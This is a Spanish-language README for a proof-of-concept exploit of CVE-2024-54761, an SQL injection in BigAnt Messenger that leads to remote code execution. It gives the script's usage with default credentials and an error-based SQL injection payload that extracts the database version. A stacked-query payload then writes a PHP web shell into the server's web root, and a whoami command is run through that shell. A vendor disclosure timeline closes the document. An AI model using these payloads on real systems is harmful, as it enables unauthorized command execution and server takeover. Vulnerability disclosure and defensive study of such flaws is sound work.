
CVE-2024-54761 PoC
La vulnerabilidad de inyección SQL en BigAnt Messenger provoca una vulnerabilidad RCE. Siga los pasos para explotarla.
Uso:
CVE-2024-54761.py [-h] -r RHOST [-p RPORT] [-u USERNAME] [-P PASSWORD]
options:
-h, --help show this help message and exit
-r, --rhost RHOST Target IP address
-p, --rport RPORT Target port (default 8000)
-u, --username USERNAME
Login username (default admin)
-P, --password PASSWORD
Login password (default 123456)
Ejecute el exploit con las credenciales por defecto.
python CVE-2024-54761.py -r 127.0.0.1
Extraiga la versión de la base de datos utilizada con el parámetro dev_code que está expuesto a SQLi.
# Payload
?dev_code=AND EXTARCTVALUE(rand(),concat(CHAR(126),version(),CHAR(126)))--
Suba una webshell PHP al objetivo mediante consultas apiladas SQL.
# Payload
?dev_code=;SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE 'C:/Program Files (x86)/BigAntSoft/IM Console/im_webserver/htdocs/shell.php'-- -
Prueba de ejecución de comandos:
/shell.php?cmd=whoami

31-10-2024: Vulnerabilidades enviadas al proveedor por correo electrónico
31-10-2024: Correo enviado al proveedor, sin respuesta
15-11-2024: Correo enviado al proveedor, sin respuesta
15-11-2024: Solicitud de CVEs